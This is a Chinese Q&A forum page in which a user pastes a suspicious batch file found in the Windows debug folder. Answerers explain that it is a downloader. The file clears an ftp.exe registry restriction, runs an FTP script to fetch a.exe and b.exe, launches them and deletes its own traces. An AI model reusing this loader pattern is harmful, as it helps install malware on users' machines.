一个批处理病毒

c:/wiindows/debug/kao这是一个批处理文件，我打开看到内容如下：谁告诉我是什么意思。谢谢！！regdelete"HKEY_LOCAL_MACHINE\S... c:/wiindows/debug/kao
这是一个批处理文件，我打开看到内容如下：

谁告诉我是什么意思。谢谢！！
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe" /f
ftp -s:C:\WINDOWS\debug\dboysb.sys
start C:\WINDOWS\debug\a.exe
start C:\WINDOWS\debug\b.exe
del C:\WINDOWS\debug\dboysb.sys
del C:\WINDOWS\debug\kao.bat
我安装的有360和kav，怎么检测不到啊？展开

 我来答

6个回答

#热议# 普通体检能查出癌症吗？

百度网友6798f48
2009-11-24 · TA获得超过163个赞

知道小有建树答主

回答量：202

采纳率：0%

帮助的人：207万

我也去答题访问个人页

关注

展开全部

reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe" /f 删除注册表中的FTP.EXE键值
ftp -s:C:\WINDOWS\debug\dboysb.sys 使用FTP -S执行DBOYSB.SYS文件。（应该是为了下载A.EXE与B.EXE的）
start C:\WINDOWS\debug\a.exe 开始运行A.EXE
start C:\WINDOWS\debug\b.exe 开始运行B.EXE
del C:\WINDOWS\debug\dboysb.sys 删除DBOYSB.SYS文件
del C:\WINDOWS\debug\kao.bat 删除KAO.BAT批处理文件

这个文件仅仅是个批处理程序里面没有病毒代码都是正常使用的代码自然不会有反应。它的作用是执行A.EXE与B.EXE 这A与B才是真正的病毒（可能）

已赞过 已踩过<

评论收起

emperra
2009-11-24 · TA获得超过1301个赞

知道小有建树答主

回答量：1125

采纳率：0%

帮助的人：986万

我也去答题访问个人页

关注

展开全部

1 删除你的一个注册表字段.
2 通过ftp -s:的方法来执行C:\WINDOWS\debug\dboysb.sys
里面的ftp语句,应该是下载病毒也就是传说中的批处理下载者
3开始运行下载下来的 a.exe和b.exe
然后删除C:\WINDOWS\debug\dboysb.sys这个ftp脚本
删除C:\WINDOWS\debug\kao.bat

已赞过 已踩过<

评论收起

能啃书的虫
2009-11-24 · TA获得超过850个赞

知道小有建树答主

回答量：1038

采纳率：0%

帮助的人：672万

我也去答题访问个人页

关注

展开全部

“怎么检测不到”？请问你用杀软扫描过那个文件夹没有？
如果确认那个是病毒，而卡巴斯基也杀不了的话，推荐几个强悍的杀毒给你：小红伞（英文版），avast！，大蜘蛛。

已赞过 已踩过<

评论收起

百度网友53dd5d136
2009-11-24 · TA获得超过201个赞

知道小有建树答主

回答量：1308

采纳率：0%

帮助的人：699万

我也去答题访问个人页

关注

展开全部

重点是看a.exe和b.exe两个文件，是否有威胁。

已赞过 已踩过<

评论收起

图西木东
2020-09-26 · 贡献了超过144个回答

知道答主

回答量：144

采纳率：0%

帮助的人：9.2万

我也去答题访问个人页

关注

展开全部

批处理杀毒软件很多不查，或者防护等级不够

已赞过 已踩过<

评论收起

2条折叠回答

更多回答（4）

推荐律师服务：若未解决您的问题，请您详细描述您的问题，通过百度律临进行免费专业咨询

一个批处理病毒

其他类似问题

为你推荐：